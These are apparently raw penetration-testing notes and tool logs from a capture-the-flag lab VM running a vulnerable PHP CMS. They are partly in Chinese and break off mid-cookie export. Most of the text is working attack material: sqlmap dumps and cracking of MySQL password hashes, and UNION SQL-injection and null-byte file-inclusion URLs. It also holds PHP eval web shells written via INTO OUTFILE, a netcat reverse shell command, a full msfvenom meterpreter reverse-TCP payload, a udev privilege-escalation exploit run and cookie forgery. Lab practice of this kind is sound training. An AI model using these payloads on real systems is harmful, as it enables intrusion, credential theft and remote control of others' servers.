[23:16:42] [INFO] using suffix '14'                                                                                                                                                          
[23:16:50] [INFO] using suffix '10'                                                                                                                                                          
[23:16:58] [INFO] using suffix '06'                                                                                                                                                          
[23:17:06] [INFO] using suffix '08'                                                                                                                                                          
[23:17:13] [INFO] using suffix '8'                                                                                                                                                           
[23:17:21] [INFO] using suffix '15'                                                                                                                                                          
[23:17:29] [INFO] using suffix '69'                                                                                                                                                          
[23:17:36] [INFO] using suffix '16'                                                                                                                                                          
[23:17:44] [INFO] using suffix '6'                                                                                                                                                           
[23:17:51] [INFO] using suffix '18'                                                                                                                                                          
[23:17:59] [INFO] using suffix '!'                                                                                                                                                           
[23:18:07] [INFO] using suffix '.'                                                                                                                                                           
[23:18:14] [INFO] using suffix '*'                                                                                                                                                           
[23:18:22] [INFO] using suffix '!!'                                                                                                                                                          
[23:18:29] [INFO] using suffix '?'                                                                                                                                                           
[23:18:37] [INFO] using suffix ';'                                                                                                                                                           
[23:18:44] [INFO] using suffix '..'                                                                                                                                                          
[23:18:52] [INFO] using suffix '!!!'                                                                                                                                                         
[23:18:59] [INFO] using suffix ', '                                                                                                                                                          
[23:19:07] [INFO] using suffix '@'                                                                                                                                                           
Database: mysql                                                                                                                                                                              
Table: user
[4 entries]
+-----------------------+----------+------------------------------+----------+-----------+-----------+------------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+--------------+--------------+---------------+---------------+----------------+-----------------+-----------------+-----------------+------------------+------------------+------------------+------------------+--------------------+---------------------+----------------------+-----------------------+
| Host                  | User     | Password                     | ssl_type | Drop_priv | File_priv | Alter_priv | Grant_priv | Index_priv | Super_priv | ssl_cipher | Create_priv | Delete_priv | Insert_priv | Reload_priv | Select_priv | Update_priv | max_updates | x509_issuer | Execute_priv | Process_priv | Show_db_priv | x509_subject | Shutdown_priv | max_questions | Show_view_priv | References_priv | Repl_slave_priv | max_connections | Create_user_priv | Create_view_priv | Lock_tables_priv | Repl_client_priv | Alter_routine_priv | Create_routine_priv | max_user_connections | Create_tmp_table_priv |
+-----------------------+----------+------------------------------+----------+-----------+-----------+------------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+--------------+--------------+---------------+---------------+----------------+-----------------+-----------------+-----------------+------------------+------------------+------------------+------------------+--------------------+---------------------+----------------------+-----------------------+
| localhost             | root     | 6cbbdf9b35eb7db1 (mysqlpass) | <blank>  | Y         | Y         | Y          | Y          | Y          | Y          | <blank>    | Y           | Y           | Y           | Y           | Y           | Y           | 0           | <blank>     | Y            | Y            | Y            | <blank>      | Y             | 0             | Y              | Y               | Y               | 0               | Y                | Y                | Y                | Y                | Y                  | Y                   | 0                    | Y                     |
| localhost.localdomain | root     | <blank>                      | <blank>  | Y         | Y         | Y          | Y          | Y          | Y          | <blank>    | Y           | Y           | Y           | Y           | Y           | Y           | 0           | <blank>     | Y            | Y            | Y            | <blank>      | Y             | 0             | Y              | Y               | Y               | 0               | Y                | Y                | Y                | Y                | Y                  | Y                   | 0                    | Y                     |
| 127.0.0.1             | root     | <blank>                      | <blank>  | Y         | Y         | Y          | Y          | Y          | Y          | <blank>    | Y           | Y           | Y           | Y           | Y           | Y           | 0           | <blank>     | Y            | Y            | Y            | <blank>      | Y             | 0             | Y              | Y               | Y               | 0               | Y                | Y                | Y                | Y                | Y                  | Y                   | 0                    | Y                     |
| %                     | cms_user | 2e0cfd856355b099             | <blank>  | Y         | Y         | Y          | N          | Y          | Y          | <blank>    | Y           | Y           | Y           | Y           | Y           | Y           | 0           | <blank>     | Y            | Y            | Y            | <blank>      | Y             | 0             | Y              | Y               | Y               | 0               | Y                | Y                | Y                | Y                | Y                  | Y                   | 0                    | Y                     |
+-----------------------+----------+------------------------------+----------+-----------+-----------+------------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+--------------+--------------+---------------+---------------+----------------+-----------------+-----------------+-----------------+------------------+------------------+------------------+------------------+--------------------+---------------------+----------------------+-----------------------+

[23:19:15] [INFO] table 'mysql.`user`' dumped to CSV file '/root/.local/share/sqlmap/output/172.16.70.141/dump/mysql/user.csv'
[23:19:15] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.16.70.141'

[*] ending @ 23:19:15 /2021-11-29/

                                                                                                                                                                                              
┌──(root💀kwkl)-[~]
└─# sqlmap -u 'http://172.16.70.141/index.php?id=3' -D mysql -T user -C User,Password  --dump
        ___
       __H__                                                                                                                                                                                  
 ___ ___[)]_____ ___ ___  {1.5.10#stable}                                                                                                                                                     
|_ -| . [.]     | .'| . |                                                                                                                                                                     
|___|_  [(]_|_|_|__,|  _|                                                                                                                                                                     
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                  

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:19:36 /2021-11-29/

[23:19:37] [INFO] resuming back-end DBMS 'mysql' 
[23:19:37] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=5k4l78aruoi...53j1etnj30'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3 AND 9068=9068

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=3 AND (SELECT 1514 FROM (SELECT(SLEEP(5)))zENA)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: id=3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7171,0x644c49467875614873585a5669644f7a74445a417779496e72634a56474474595a6e437542477350,0x716a6b6271)-- -
---
[23:19:38] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: PHP 5.2.6, PHP, Apache 2.2.3
back-end DBMS: MySQL >= 5.0.12
[23:19:38] [INFO] fetching entries of column(s) 'Password,`User`' for table 'user' in database 'mysql'
[23:19:38] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[23:19:39] [INFO] writing hashes to a temporary file '/tmp/sqlmapfgwkgd6528295/sqlmaphashes-hgq2jwa1.txt' 
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[23:19:40] [INFO] using hash method 'mysql_old_passwd'
[23:19:40] [INFO] resuming password 'mysqlpass' for hash '6cbbdf9b35eb7db1'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 
[23:19:42] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[23:19:43] [INFO] starting dictionary-based cracking (mysql_old_passwd)
[23:19:43] [INFO] starting 12 processes 
[23:19:49] [INFO] using suffix '1'                                                                                                                                                           
[23:19:57] [INFO] using suffix '123'                                                                                                                                                         
[23:20:05] [INFO] using suffix '2'                                                                                                                                                           
[23:20:13] [INFO] using suffix '12'                                                                                                                                                          
[23:20:21] [INFO] using suffix '3'                                                                                                                                                           
[23:20:29] [INFO] using suffix '13'                                                                                                                                                          
[23:20:37] [INFO] using suffix '7'                                                                                                                                                           
[23:20:45] [INFO] using suffix '11'                                                                                                                                                          
[23:20:53] [INFO] using suffix '5'                                                                                                                                                           
[23:21:01] [INFO] using suffix '22'                                                                                                                                                          
[23:21:09] [INFO] using suffix '23'                                                                                                                                                          
[23:21:17] [INFO] using suffix '01'                                                                                                                                                          
[23:21:25] [INFO] using suffix '4'                                                                                                                                                           
[23:21:33] [INFO] using suffix '07'                                                                                                                                                          
[23:21:41] [INFO] using suffix '21'                                                                                                                                                          
[23:21:50] [INFO] using suffix '14'                                                                                                                                                          
[23:21:58] [INFO] using suffix '10'                                                                                                                                                          
[23:22:06] [INFO] using suffix '06'                                                                                                                                                          
[23:22:14] [INFO] using suffix '08'                                                                                                                                                          
[23:22:23] [INFO] using suffix '8'                                                                                                                                                           
[23:22:32] [INFO] using suffix '15'                                                                                                                                                          
[23:22:40] [INFO] using suffix '69'                                                                                                                                                          
[23:22:48] [INFO] using suffix '16'                                                                                                                                                          
[23:22:56] [INFO] using suffix '6'                                                                                                                                                           
[23:23:03] [INFO] using suffix '18'                                                                                                                                                          
[23:23:11] [INFO] using suffix '!'                                                                                                                                                           
[23:23:18] [INFO] using suffix '.'                                                                                                                                                           
[23:23:26] [INFO] using suffix '*'                                                                                                                                                           
[23:23:34] [INFO] using suffix '!!'                                                                                                                                                          
[23:23:41] [INFO] using suffix '?'                                                                                                                                                           
[23:23:49] [INFO] using suffix ';'                                                                                                                                                           
[23:23:56] [INFO] using suffix '..'                                                                                                                                                          
[23:24:05] [INFO] using suffix '!!!'                                                                                                                                                         
[23:24:13] [INFO] using suffix ', '                                                                                                                                                          
[23:24:21] [INFO] using suffix '@'                                                                                                                                                           
Database: mysql                                                                                                                                                                              
Table: user
[4 entries]
+----------+------------------------------+
| User     | Password                     |
+----------+------------------------------+
| root     | 6cbbdf9b35eb7db1 (mysqlpass) |
| root     | <blank>                      |
| root     | <blank>                      |
| cms_user | 2e0cfd856355b099             |
+----------+------------------------------+

[23:24:29] [INFO] table 'mysql.`user`' dumped to CSV file '/root/.local/share/sqlmap/output/172.16.70.141/dump/mysql/user.csv'
[23:24:29] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.16.70.141'

[*] ending @ 23:24:29 /2021-11-29/

                                                                                                                                                                                              
┌──(root💀kwkl)-[~]
└─# 

image-20211129232940623

┌──(root💀kwkl)-[~]
└─# sqlmap -dmysql://root:root@172.16.70.141:3306/cms --sql-shellselect @@version;                                                                                                        2 ⨯
        ___
       __H__                                                                                                                                                                                  
 ___ ___[)]_____ ___ ___  {1.5.10#stable}                                                                                                                                                     
|_ -| . [']     | .'| . |                                                                                                                                                                     
|___|_  ["]_|_|_|__,|  _|                                                                                                                                                                     
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                  

Usage: python3 sqlmap [options]

sqlmap: error: no such option: --sql-shellselect
                                                                                                                                                                                              
┌──(root💀kwkl)-[~]
└─#   

image-20211129233547813

http://172.16.61.130/,apache_tmp.php?cmd=uname%20-a;%20cat
%20/etc/redhat-release

http://172.16.70.141/,apache_tmp.php?cmd=uname%20-a;%20cat%20/etc/passwd

http://172.16.70.141/actions/login.php?action=../../conf/config.ini%00

http://172.16.70.141/actions/login.php?action=backdoor.php?cmd=ls%20/tmp%00


id=-1')) union select 1,"<?php phpinfo();?>",3 into outfile "\\tmp\\1.php"%23


http://172.16.70.141/index.php?id=4%20UNION%20select%201,load_file(%27/var/www/html/actions/login.php%27),3,4,5,6,7%20from%20dual

http://172.16.70.141/?id=4%20UNION%20select%201,load_file(%27/var/www/html/index.php%27),3,4,5,6,7%20from%20dual

image-20211130235205462

%20UNION%20select%201,load_file(%27/var/www/html/actions/login.php%27),3,4,5,6,7%20from%20dual

https://172.16.70.141/index.php?id=1%20%20UNION%20select%201,load_file(%27/var/www/html/index.php%27),3,4,5,6,7%20from%20dual

* **/ //make sure the app will run! include_once('inc/config_check.php'); session_start(); $logged_in = isset($_COOKIE['logged_in']) ? $_COOKIE['logged_in'] : 0; //get configuration variables $configs = parse_ini_file('conf/config.ini') or die("Error parsing config file conf/config.ini"); //set up loggin include_once('lib/log.class.php'); $log = new Log(); //set up the db connection $conn = mysql_connect($configs['database_host'], $configs['database_user'], $configs['database_pass']) or $log->append(mysqlerror()); mysql_select_db($configs['database_db']); $action = (isset($_GET['action'])) ? $_GET['action'] : 'default'; $valid_actions = array( 'default', 'login', 'add_event', 'edit_event', 'view_event', 'delete_event', 'logout', 'users', 'logs'); //auth check $is_admin = 0; if (isset($_COOKIE['user_id']) && isset($_COOKIE['hash'])) { $sql = 'SELECT user_id FROM user WHERE user_id = ' . $_COOKIE['user_id'] . ' AND user_password = \'' . $_COOKIE['hash'] . '\''; $retval = mysql_query($sql) or $log->append("Problem with sql $sql " . mysql_error()); if (mysql_num_rows($retval) > 0 ) $is_admin = 1; } $admin_actions = array('add_event', 'edit_event', 'view_event', 'delete_event', 'users', 'logs'); if (in_array($action, $admin_actions) && ! $is_admin) $action = 'default'; if (! in_array($action, $valid_actions)) $action = 'default'; if ($action != 'delete_event' && $action != 'logout') include_once('inc/header.php'); include_once('actions/'.$action . '.php'); include_once('inc/footer.php'); ?>
Posted by: 7
image3 

http://172.16.70.141/index.php?id=1%20UNION%20select%201,load_file(%27/var/www/html/actions/login.php%27),3,4,5,6,7%20from%20dual


* **/ $logged_in = isset($_COOKIE['logged_in']) ? $_COOKIE['logged_in'] : 0; if (isset($_POST['username']) && isset($_POST['password'])) { $sql = "select user_id from user where user_username = '" . $_POST['username'] . "'"; $query = mysql_query($sql) or die("Query error with $sql: " . mysql_error()); if ($query && mysql_num_rows($query) > 0) { //user exists $uname = mysql_fetch_object($query); $sql = "select * from user where user_id = " . $uname->user_id . " AND user_password = md5('" . $_POST['password'] . "')"; $query = mysql_query($sql) or $log->append("Query error in login $sql " . mysql_error()); $retval = array(); if (! $query) { //no return value } else { $retval = mysql_fetch_object($query); } } if (isset($retval->user_id)) { setcookie("logged_in", 1, time()+3600); setcookie("user_id", $retval->user_id, time()+3600); setcookie("hash", $retval->user_password, time()+3600); $logged_in = 1; } } if ($logged_in) include_once('templates/logged_in.tpl'); else include_once('templates/'.$_GET['action'].'.tpl'); ?>
Posted by: 7
image3 

image-20211130235353127


http://172.16.70.141/index.php?id=1%20UNION%20select%20NULL,NULL,NULL,NULL,NULL,NULL,%27%3C?php%20echo%20system($_POST[\%27cmd\%27]);?%3E%27%20INTO%20OUTFILE%20%27/tmp/008st7845.php%27


http://172.16.70.141/index.php?id=1%20UNION%20select%20NULL,NULL,NULL,NULL,NULL,NULL,%27%3C?php%20echo%20system($_POST[\%27cmd\%27]);?%3E%27%20INTO%20OUTFILE%20%27/tmp/008st7845.php%27

http://172.16.70.141/actions/login.php?action=/tmp/008st7845.php?cmd=ls%20/tmp%00

http://172.16.70.141/actions/login.php?action=../../conf/config.ini%00

http://172.16.70.141/actions/login.php?action=../../../../tmp/008st7845.php%00


http://172.16.70.141/actions/login.php?action=../../../../tmp/008st7845.php?cmd=ls%20/tmp%00

(1)连接数据库

sqlmap -d "mysql://root:mysqlpass@172.16.70.141:3306/mysql" --os-shell

CREATE DATABASE foo;CREATE TABLE foo.bar ( baz VARCHAR(100) PRIMARY KEY );INSERT INTO foo.bar SELECT "<?php file_put_contents('shell.php','<?php @eval($_POST[1]);?>');?>";

select '<?php  @eval($_POST[1]);?>' into outfile '/var/www/html/11.php';

查看慢查询日志开启情况show variables like '%slow_query_log%';开启慢查询日志set global slow_query_log=1;修改日志文件存储的绝对路径set global slow_query_log_file='E:/phpStudy2018/PHPTutorial/WWW/shell.php';向日志文件中写入shellselect '<?php @eval($_POST[1]);?>' or sleep(11);
————————————————
版权声明:本文为CSDN博主「weixin_39872872」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/weixin_39872872/article/details/112589789

image-20211201000253478

image-20211201003501538

cmd=echo "<?php echo system(\$_GET['cmd']);?>" > /var/www/html/.apache_tmp.php

cmd=echo "<?php @eval($_POST[1]);?>" > /var/www/html/.apache_tmp.php

iles/palm-pilot.png 1 13 admin \N \N \N \N \N \N root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash pcap:x:77:77::/var/arpwatch:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin john:x:500:500::/home/john:/bin/bash linda:x:501:501::/home/linda:/bin/bash fred:x:502:502::/home/fred:/bin/bash molly:x:503:503::/home/molly:/bin/bash toby:x:504:504::/home/toby:/bin/bash toby:x:504:504::/home/toby:/bin/bash


 1       | 25e4ee4e9229397b6b17776bfceaf8e7 (adminpass) | admin  
 
 

cmd=echo "<?php echo @eval($_POST[x]);?>" > /var/www/html/.apache_tmp.php

cmd=echo "<?php echo system(\$_GET['cmd']);?>" > /var/www/html/2.php



select '<?php  @eval($_POST[1]);?>' into outfile '/var/www/html/2.php'


cmd=cp /tmp/008st7846.php /var/www/html/11.php

cmd=chmod 777 /var/www/html/11.php

cmd=chmod 777 /var/www/html/nc

cmd=/var/www/html/netcat -e
/bin/sh 172.16.61.132 3333




image-20211201235951851

image-20211202000011608

image-20211202000103616

pinginglab方法::::

 nmap -A -v -sS -sV -p- 172.16.70.141
 
http://172.16.70.141/index.php?id=4AND%20SLEEP(5)

='admin', user_password=md5('adminpass');


http://172.16.70.141/sql/db.sql

http://172.16.70.141/docs/

http://172.16.70.141/actions/login.php?action=../../../../etc/passwd%00
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash pcap:x:77:77::/var/arpwatch:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin john:x:500:500::/home/john:/bin/bash linda:x:501:501::/home/linda:/bin/bash fred:x:502:502::/home/fred:/bin/bash molly:x:503:503::/home/molly:/bin/bash toby:x:504:504::/home/toby:/bin/bash 


 1       | 25e4ee4e9229397b6b17776bfceaf8e7 (adminpass) | admin  


下载审计
default.php
<?php 
/**
 * This is the default controller.
 * This application is meant to be part of the PHP Code Auditing 
 * course offered by SAS Information Security.  Don *not* install
 * this application on a live server
 * 
 * @package PHP Code Auditing 
 * @author Justin C. Klein Keane <jukeane@sas.upenn.edu>
 * 
**/
$id = isset($_GET['id']) ? $_GET['id'] : 0;
在default.php文件中发现SQL注入代码,对用户可控的参数$id没有进行任 何的过滤或验证,会发生注入缺陷。


文件包含
 if ($logged_in) 
    include_once('templates/logged_in.tpl');
else 
    include_once('templates/'.$_GET['action'].'.tpl');
?>
在login.php中发现了文件包含,实际测试中需要使用%00阶段绕过


  269  msfvenom -p php/meterpreter/reverse_tcp LHOST=172.16.70.122 LPORT=4444 -o shell.php
                                                                                                             

┌──(kwkl㉿kwkl)-[~/HODL/ctf5]
└─$ msfvenom -p php/meterpreter/reverse_tcp LHOST=172.16.70.122 LPORT=4444 -o shell.php                                                                                      1[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1114 bytes
Saved as: shell.php

                                                                                                                                                                          
┌──(kwkl㉿kwkl)-[~/HODL/ctf5]
└─$ ls                                                                                                                                                                       2 ⨯
shell.php
                                                                                                                                                                                 
┌──(kwkl㉿kwkl)-[~/HODL/ctf5]
└─$ cat shell.php    
/*<?php /**/ error_reporting(0); $ip = '172.16.70.122'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();  


上传shell

 1       | 25e4ee4e9229397b6b17776bfceaf8e7 (adminpass) | admin  
 
 use exploit/multi/handler
set payload php/meterpreter/reverse_tcp set lhost kali的IP
exploit

http://172.16.70.141/files/shell.php

after upload darkshell

uname -a
Linux localhost.localdomain 2.6.18-92.el5 #1 SMP Tue Jun 10 18:49:47 EDT 2008 i686 i686 i386 GNU/Linux 


cat /etc/passwd | grep apache

apache:x:48:48:Apache:/var/www:/sbin/nologin 

cat /etc/redhat-release
cat /etc/redhat-release
CentOS release 5.2 (Final) 

download netcat
──(kwkl㉿kwkl)-[~/HODL/ctf5]
└─$ wget https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1-1.i386.rpm
--2021-12-19 23:14:15--  https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1-1.i386.rpm
正在解析主机 sourceforge.net (sourceforge.net)... 204.68.111.105
正在连接 sourceforge.net (sourceforge.net)|204.68.111.105|:443... 已连接。
已发出 HTTP 请求,正在等待回应... 301 Moved Permanently
位置:https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1-1.i386.rpm/ [跟随至新的 URL]
--2021-12-19 23:14:16--  https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1-1.i386.rpm/
再次使用存在的到 sourceforge.net:443 的连接。
已发出 HTTP 请求,正在等待回应... 302 Found
位置:https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1-1.i386.rpm/download [跟随至新的 URL]
--2021-12-19 23:14:16--  https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1-1.i386.rpm/download
再次使用存在的到 sourceforge.net:443 的连接。
已发出 HTTP 请求,正在等待回应... 302 Found
位置:https://downloads.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1-1.i386.rpm?ts=gAAAAABhv0xJOhKpxTJf8OxAINxwfaWxs7qCrIsOXuFZy8CuhDfSRg1vOqcRdAD0-HyAJw5OCAnbKMabLNncISYHhst5Pp7JYg%3D%3D&use_mirror=udomain&r= [跟随至新的 URL]
--2021-12-19 23:14:17--  https://downloads.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1-1.i386.rpm?ts=gAAAAABhv0xJOhKpxTJf8OxAINxwfaWxs7qCrIsOXuFZy8CuhDfSRg1vOqcRdAD0-HyAJw5OCAnbKMabLNncISYHhst5Pp7JYg%3D%3D&use_mirror=udomain&r=
正在解析主机 downloads.sourceforge.net (downloads.sourceforge.net)... 204.68.111.105
正在连接 downloads.sourceforge.net (downloads.sourceforge.net)|204.68.111.105|:443... 已连接。
已发出 HTTP 请求,正在等待回应... 302 Found
位置:https://udomain.dl.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1-1.i386.rpm [跟随至新的 URL]
--2021-12-19 23:14:18--  https://udomain.dl.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1-1.i386.rpm
正在解析主机 udomain.dl.sourceforge.net (udomain.dl.sourceforge.net)... 203.135.147.10
正在连接 udomain.dl.sourceforge.net (udomain.dl.sourceforge.net)|203.135.147.10|:443... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:123912 (121K) [application/octet-stream]
正在保存至: “netcat-0.7.1-1.i386.rpm”

netcat-0.7.1-1.i386.rpm         100%[====================================================>] 121.01K   296KB/s  用时 0.4s    

2021-12-19 23:14:20 (296 KB/s) - 已保存 “netcat-0.7.1-1.i386.rpm” [123912/123912])

                                                                                                                             
┌──(kwkl㉿kwkl)-[~/HODL/ctf5]
└─$ 




rmp -Uvh netcat-0.7.1-1.i386.rpm



                                                                                                                                                                                
┌──(root💀kwkl)-[/opt/w3af-master/extras/docker]
└─# searchsploit Linux udev  
----------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                 |  Path
----------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Local Privilege Escalation (1)                                                  | linux/local/8478.sh
Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) UDEV < 1.4.1 - Local Privilege Escalation (2)                                                     | linux/local/8572.c
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation                                                                                     | linux/local/41886.c
Linux Kernel UDEV < 1.4.1 - 'Netlink' Local Privilege Escalation (Metasploit)                                                                  | linux/local/21848.rb
QEMU - Denial of Service                                                                                                                       | linux/dos/47320.c
----------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
                                                                                                                                                                                 
┌──(root💀kwkl)-[/opt/w3af-master/extras/docker]
└─# 

chmod +x 8478.sh

-rwxr-xr-x 1 apache apache 3.3K Nov 28 16:26 8478.sh 

查看内核进程用户进程的pid和状态: cat /proc/net/netlink

sk Eth Pid Groups Rmem Wmem Dump Locks cfebce00 0 0 00000000 0 0 00000000 2 cf830e00 0 3198 00000111 0 0 00000000 2 cfc5fa00 6 0 00000000 0 0 00000000 2 cfe78600 7 0 00000000 0 0 00000000 2 cf83b800 9 2528 00000000 0 0 00000000 2 cfe66e00 9 0 00000000 0 0 00000000 2 cf557c00 10 0 00000000 0 0 00000000 2 cf513c00 11 0 00000000 0 0 00000000 2 cfc5f400 15 569 ffffffff 0 0 00000000 2 cfebcc00 15 0 00000000 0 0 00000000 2 cf513a00 16 0 00000000 0 0 00000000 2 cf6b7c00 18 0 00000000 0 0 00000000 2 

./8478.sh


/tmp/udev 569

./udev 568




`

image-20211218231156549

image-20211218231447834

image-20211218231544621

image-20211218231837541

修改cookie有惊喜

[
{
“name”: “roundcube_sessid”,
“value”: “n0f29i2hp5kv4ncg94fkrgga33”,
“domain”: “172.16.70.141”,
“hostOnly”: true,
“path”: “/”,
“secure”: false,
“httpOnly”: false,
“sameSite”: “no_restriction”,
“session”: true,
“firstPartyDomain”: “”,
“storeId”: null
},
{
“name”: “logged_in”,
“value”: “1”,
“domain”: “172.16.70.141”,
“hostOnly”: true,
“path”: “/”,
“secure”: false,
“httpOnly”: false,
“sameSite”: “no_restriction”,
“session”: true,
“firstPartyDomain”: “”,
“storeId”: null
},
{
“name”: “hash”,
“value”: “25e4ee4e9229397b6b17776bfceaf8e7”,
“domain”: “172.16.70.141”,
“hostOnly”: true,
“path”: “/”,
“secure”: false,
“httpOnly”: false,
“sameSite”: “no_restriction”,
“session”: true,
